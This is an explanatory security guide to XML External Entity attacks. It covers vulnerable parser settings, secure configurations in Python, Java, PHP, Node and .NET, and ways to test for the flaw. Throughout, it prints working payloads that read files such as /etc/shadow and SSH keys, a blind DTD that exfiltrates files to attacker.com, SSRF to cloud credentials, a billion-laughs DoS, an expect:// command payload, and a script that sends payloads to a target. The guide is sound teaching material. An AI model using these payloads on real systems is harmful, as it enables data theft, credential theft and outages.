#
XML External Entity (XXE) Attacks
CRITICAL SEVERITY FILE DISCLOSURE XML INJECTION
Imagine filling out a form that asks for your name, but instead of writing "John," you write "Please read the contents of the safe behind you and write it here" - and the clerk actually does it. That's XML External Entity (XXE) in a nutshell.
XXE attacks exploit how computers process XML files. When you upload a specially crafted XML file, the server reads it and unknowingly executes malicious instructions embedded within, like reading sensitive files or making network requests you shouldn't be able to make.
Simple Example: You upload an innocent-looking XML file to a website. Hidden in that file is an instruction that says "Read /etc/passwd file." The server obediently reads the file and includes its contents in the response - giving you access to system files you should never see.
Critical for Legacy Systems
While newer applications use JSON instead of XML, millions of legacy systems still process XML - SOAP APIs, document processors, configuration parsers, and more. XXE remains a critical vulnerability that can lead to file disclosure, server-side request forgery (SSRF), and denial of service.
#
What is XXE? (In Simple Terms)
XML (eXtensible Markup Language) is a way to structure data, kind of like HTML. It looks like this:
<person>
<name>John</name>
<age>30</age>
</person>
Entities in XML are like variables or shortcuts. You can define them like this:
<!ENTITY company "Acme Corp">
<message>Welcome to &company;</message>
When processed, &company; gets replaced with "Acme Corp".
External Entities can reference files or URLs:
<!ENTITY external SYSTEM "file:///etc/passwd">
<data>&external;</data>
The Vulnerability
If the XML parser is configured to process external entities (which many are by default), it will read the referenced file and include its contents. This is what hackers exploit.
#
Real-World Analogies
You're filling out a form at a government office. In the "Name" field, instead of writing your name, you write: "Copy the contents of File #1234 into this field." If the clerk follows instructions blindly, they'll read a confidential file and write it on your form for you to see.
You hand someone a document to copy. Hidden in your document is an instruction: "Go to the filing cabinet, retrieve Document X, and make a copy for this person." If they follow embedded instructions without thinking, they'll give you documents you shouldn't have access to.
Mad Libs asks you to fill in blanks: "The ___ ran to the ___." Normally you write words. But what if you write "contents of my diary" in the blank? If the Mad Libs book could actually fetch and insert your diary contents, that's XXE - using a placeholder to inject external content.
#
How XXE Works (The Step-by-Step Story)
Let's see how a typical XXE attack unfolds:
Scenario: Website with XML File Upload
<!-- User uploads normal XML -->
<?xml version="1.0"?>
<order>
<item>Laptop</item>
<quantity>1</quantity>
</order>
Server processes it normally and displays: "Order received: 1 Laptop"
<!-- Hacker uploads this -->
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<order>
<item>&xxe;</item>
<quantity>1</quantity>
</order>
- Parser sees
<!ENTITY xxe SYSTEM "file:///etc/passwd"> - Parser defines entity "xxe" that references /etc/passwd
- Parser sees
&xxe;in the XML - Parser reads /etc/passwd file
- Parser replaces
&xxe;with file contents
Order received: 1 root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...
The hacker just read the server's password file!
#
Types of XXE Attacks
#
1. Classic XXE (File Disclosure)
FILE ACCESS DATA THEFT
What it is: Reading files from the server's filesystem.
Attack Example:
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY file SYSTEM "file:///etc/passwd">
]>
<userInfo>
<firstName>&file;</firstName>
</userInfo>
Files Hackers Target:
<!ENTITY file SYSTEM "file:///etc/passwd"> <!-- User accounts -->
<!ENTITY file SYSTEM "file:///etc/shadow"> <!-- Password hashes -->
<!ENTITY file SYSTEM "file:///etc/hosts"> <!-- Network configuration -->
<!ENTITY file SYSTEM "file:///proc/self/environ"> <!-- Environment variables -->
<!ENTITY file SYSTEM "file:///var/log/apache2/access.log"> <!-- Logs -->
<!ENTITY file SYSTEM "file:///root/.ssh/id_rsa"> <!-- SSH keys -->
<!ENTITY file SYSTEM "file:///C:/Windows/System32/drivers/etc/hosts">
<!ENTITY file SYSTEM "file:///C:/Users/Administrator/.ssh/id_rsa">
<!ENTITY file SYSTEM "file:///C:/inetpub/wwwroot/web.config">
<!ENTITY file SYSTEM "file:///var/www/html/config.php"> <!-- Database passwords -->
<!ENTITY file SYSTEM "file:///app/secrets.json"> <!-- API keys -->
<!ENTITY file SYSTEM "file:///.env"> <!-- Environment config -->
Vulnerable Code:
from lxml import etree
xml_data = request.files['upload'].read()
# Default settings allow external entities!
parser = etree.XMLParser()
tree = etree.fromstring(xml_data, parser)
# Attacker can read any file the server can access
// Java - VULNERABLE
DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
// External entities enabled by default!
DocumentBuilder builder = factory.newDocumentBuilder();
Document doc = builder.parse(new InputSource(new StringReader(xmlData)));
// PHP - VULNERABLE
// libxml_disable_entity_loader is deprecated but still used
libxml_disable_entity_loader(false); // DANGEROUS!
$xml = simplexml_load_string($xmlData);
#
2. Blind XXE (No Direct Output)
STEALTHY OUT-OF-BAND
What it is: The application processes XML but doesn't return the parsed data to you. You need to exfiltrate data out-of-band.
Attack Method - Out-of-Band Exfiltration:
Create file at http://attacker.com/evil.dtd:
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % exfiltrate SYSTEM 'http://attacker.com/log?data=%file;'>">
%eval;
%exfiltrate;
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">
%xxe;
]>
<data>test</data>
What happens:
- Server parses your XML
- Server fetches evil.dtd from your server
- evil.dtd reads /etc/passwd
- evil.dtd makes HTTP request to attacker.com with file contents in URL
You receive the data in your server logs:
GET /log?data=root:x:0:0:root:/root:/bin/bash... HTTP/1.1
#
3. XXE to SSRF
NETWORK ACCESS INTERNAL SYSTEMS
What it is: Using XXE to make the server send requests to internal systems.
Attack:
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://localhost:8080/admin">
]>
<data>&xxe;</data>
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>
<data>&xxe;</data>
SSRF Impact
Same as SSRF - can access internal services, steal cloud credentials, scan internal networks.
#
4. Billion Laughs (XXE DoS)
DENIAL OF SERVICE RESOURCE EXHAUSTION
What it is: Denial of Service through exponential entity expansion.
Attack:
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
What Happens:
lol9expands to 10lol8's- Each
lol8expands to 10lol7's - This continues...
- Final expansion: 3 billion "lol" strings
- Server runs out of memory and crashes
Why "Billion Laughs"
The word "lol" is repeated a billion times, which would be "laughing" a billion times.
#
5. XXE in Different File Formats
HIDDEN XXE
XXE isn't just in .xml files. Many file formats use XML internally:
1. Create malicious XXE in word/document.xml
2. Zip it as .docx
3. Upload to document processor
4. XXE executes when opened
1. Malicious XML in xl/worksheets/sheet1.xml
2. Same attack as DOCX
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<svg width="500" height="500">
<text x="0" y="16">&xxe;</text>
</svg>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<soap:Body>
<getUserInfo>
<userId>&xxe;</userId>
</getUserInfo>
</soap:Body>
</soap:Envelope>
#
Real-World Attack Scenarios
#
Scenario 1: Facebook XXE Vulnerability (2014)
$30K BOUNTY RESPONSIBLE DISCLOSURE
The Setup:
- Facebook allowed uploading office documents
- Documents were processed server-side for preview
- DOCX files contain XML
The Attack:
Researcher created DOCX with XXE payload
XXE payload read internal files
Could access:
- Internal network configurations
- Source code
- Configuration files
Impact:
- Reported through bug bounty
- Facebook paid $30,000 reward
- Vulnerability patched quickly
#
Scenario 2: Google's XXE in XML Editor
CLIENT-SIDE XXE
The Attack:
- Google Toolbar used XML for configuration
- XML editor didn't disable external entities
Attack Payload:
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///c:/boot.ini">
]>
<config>&xxe;</config>
Result:
- Could read local files from user's computer
- Patched after responsible disclosure
#
Scenario 3: IRS E-Filing XXE (2018)
GOVERNMENT SYSTEM TAX DATA
The Setup:
- IRS tax filing system accepted XML
- Used for business tax returns
- Inadequate XXE protection
Potential Attack:
<!-- Tax return XML -->
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<TaxReturn>
<BusinessName>&xxe;</BusinessName>
</TaxReturn>
Impact:
- Could have accessed sensitive tax data
- Found by security researchers
- Government patched before exploitation
#
Scenario 4: WordPress Plugin XXE
MASS EXPLOITATION WORDPRESS
:icon-wordpress: The Vulnerability:
- Popular WordPress plugin processed XML feeds
- RSS/Atom feed parser had XXE vulnerability
Attack:
<!-- Malicious RSS feed -->
<?xml version="1.0"?>
<!DOCTYPE rss [
<!ENTITY xxe SYSTEM "file:///var/www/html/wp-config.php">
]>
<rss version="2.0">
<channel>
<title>&xxe;</title>
</channel>
</rss>
Result:
- Exposed WordPress database credentials
- Affected thousands of websites
- Emergency patch released
#
Advanced XXE Techniques
#
1. PHP Expect Wrapper (Remote Code Execution)
RCE
If PHP's expect module is loaded:
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "expect://id">
]>
<data>&xxe;</data>
Remote Code Execution
Executes id command on server
#
2. Parameter Entities for Blind XXE
ADVANCED
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
%dtd;
%all;
]>
<foo>&send;</foo>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://attacker.com/?data=%file;'>">
#
3. UTF-7 Encoding Bypass
FILTER EVASION
Some filters check for <!ENTITY but miss encoded versions:
<?xml version="1.0" encoding="UTF-7"?>
+ADw-+ACE-ENTITY xxe SYSTEM +ACI-file:///etc/passwd+ACI +AD4
#
4. XInclude Attacks
ALTERNATIVE METHOD
When you can't control DTD but can control XML content:
<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/>
</foo>
#
Prevention and Mitigation
#
1. Disable External Entities (Primary Defense)
PRIMARY DEFENSE
from lxml import etree
# SECURE: Disable external entities
parser = etree.XMLParser(
resolve_entities=False, # Don't resolve entities
no_network=True, # No network access
load_dtd=False # Don't load DTD
)
xml_data = request.files['upload'].read()
tree = etree.fromstring(xml_data, parser)
import javax.xml.parsers.DocumentBuilderFactory;
DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
// SECURE: Disable all the things
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
factory.setXIncludeAware(false);
factory.setExpandEntityReferences(false);
DocumentBuilder builder = factory.newDocumentBuilder();
Document doc = builder.parse(new InputSource(new StringReader(xmlData)));
<?php
// SECURE: Disable external entities
libxml_disable_entity_loader(true);
// Even better: use simplexml with LIBXML_NOENT disabled
$xml = simplexml_load_string(
$xmlData,
'SimpleXMLElement',
LIBXML_NOCDATA | LIBXML_NONET
);
?>
const libxmljs = require('libxmljs');
// SECURE: Disable external entities
const xml = libxmljs.parseXml(xmlData, {
noent: false, // Don't substitute entities
nonet: true, // No network access
dtdload: false, // Don't load DTD
dtdvalid: false // Don't validate against DTD
});
using System.Xml;
XmlReaderSettings settings = new XmlReaderSettings();
// SECURE: Disable DTD processing
settings.DtdProcessing = DtdProcessing.Prohibit;
settings.XmlResolver = null;
using (XmlReader reader = XmlReader.Create(stream, settings))
{
XmlDocument doc = new XmlDocument();
doc.Load(reader);
}
#
2. Use Simple Data Formats
RECOMMENDED
Avoid XML When Possible:
<order>
<item>Laptop</item>
<quantity>1</quantity>
</order>
{
"order": {
"item": "Laptop",
"quantity": 1
}
}
Why JSON is Better
JSON doesn't have entity expansion or DTD processing - no XXE vulnerability!
#
3. Input Validation
DEFENSE IN DEPTH
import re
def validate_xml(xml_string):
"""Check for suspicious XML content"""
dangerous_patterns = [
r'<!ENTITY',
r'<!DOCTYPE',
r'SYSTEM',
r'PUBLIC',
r'file://',
r'http://',
r'https://',
r'expect://',
r'php://'
]
for pattern in dangerous_patterns:
if re.search(pattern, xml_string, re.IGNORECASE):
raise ValueError(f"Suspicious XML content: {pattern}")
return True
# Usage
xml_data = request.files['upload'].read()
validate_xml(xml_data) # Throws error if malicious
Important Note
Input validation is defense-in-depth, not primary defense. Always disable external entities!
#
4. Use Modern XML Libraries
RECOMMENDED
Recommended Libraries:
defusedxml - Secure XML library specifically for preventing attacks
import defusedxml.ElementTree as ET
# Automatically prevents XXE, billion laughs, etc.
tree = ET.parse('file.xml')
Use latest versions with secure defaults or consider using JSON instead
fast-xml-parser with safe defaults. Better: use JSON
#
5. Least Privilege
INFRASTRUCTURE
# Run application with limited permissions
# Can't read /etc/passwd if process doesn't have permission
# Create limited user
useradd -r -s /bin/false xmlapp
# Run app as limited user
su -s /bin/sh xmlapp -c 'node server.js'
# Application files should not be readable by app user
chmod 640 /app/config/database.yml
chown root:root /app/config/database.yml
# App runs as 'xmlapp' user
# Even if XXE exists, can't read config files
#
Testing for XXE Vulnerabilities
#
Manual Testing
TESTING GUIDE
- File uploads (.xml, .docx, .xlsx, .svg)
- API endpoints accepting XML
- SOAP web services
- RSS/Atom feed parsers
- Configuration file uploads
Upload this XML:
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY test "Hello XXE">
]>
<data>&test;</data>
If response contains "Hello XXE", entities are processed.
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/hostname">
]>
<data>&xxe;</data>
Check if hostname appears in response.
Set up listener:
nc -lvp 9001
Upload XML:
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://YOUR-IP:9001/test">
]>
<data>&xxe;</data>
If you receive connection, blind XXE exists.
#
Automated Tools
# Test for XXE
ruby XXEinjector.rb --host=192.168.1.100 --path=/upload --file=/tmp/test.xml --oob=http --phpfilter
# Enumerate files
ruby XXEinjector.rb --host=target.com --file=request.txt --enumeration
1. Capture XML request
2. Send to Intruder
3. Insert XXE payloads
4. Analyze responses
import requests
url = "http://target.com/upload"
# Test payloads
payloads = [
# Basic entity
'''<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY test "XXE_WORKS">]>
<data>&test;</data>''',
# File disclosure
'''<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/hostname">]>
<data>&xxe;</data>''',
# Out-of-band
'''<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://attacker.com/xxe">]>
<data>&xxe;</data>'''
]
for i, payload in enumerate(payloads):
response = requests.post(url, data=payload, headers={'Content-Type': 'application/xml'})
print(f"Payload {i+1}:")
print(f"Status: {response.status_code}")
print(f"Response: {response.text[:200]}")
print("-" * 50)
#
Summary: What You Need to Remember
XML External Entity (XXE) exploits how XML parsers process external references. By uploading specially crafted XML, attackers can read server files, make internal network requests, or crash the server through resource exhaustion.
The Simple Version:
- What it is: Tricking XML parser into reading files or making requests by embedding malicious entity references
- Why it's dangerous: Can read sensitive files (passwords, keys), access internal systems (SSRF), or crash servers (DoS)
- How to prevent it: Disable external entity processing in XML parsers, use JSON instead of XML
Real-World Impact:
- Facebook: Internal file disclosure (2014) - $30K bug bounty
- IRS: Tax system vulnerability (2018)
- :icon-wordpress: WordPress: Mass exploitation through plugins
Common Targets: Configuration files, password files, SSH keys, source code
#
Quick Protection Checklist
For Website Owners & Developers:
DO Disable external entity processing in all XML parsers DO Disable DTD (Document Type Definition) processing DO Use simple data formats (JSON) instead of XML when possible DO Use secure XML libraries (defusedxml, latest versions) DO Run application with least privilege DO Validate and sanitize XML input DO Keep XML processing libraries updated
DON'T Allow external entity resolution in XML parsers DON'T Process untrusted XML with default parser settings DON'T Return raw XML parsing errors to users DON'T Trust office documents (.docx, .xlsx) - they contain XML DON'T Allow DTD declarations in user-supplied XML
For Regular Users:
TIP Be cautious uploading XML files to untrusted sites - they could test for XXE TIP XXE mainly affects servers, not end users directly TIP If you manage systems, audit all XML-processing code
#
Additional Resources
Learn More
Layerd AI Guardian Proxy can detect XXE attack patterns in uploaded XML and block malicious entity declarations before they reach your application. Learn more →
Last updated: November 2025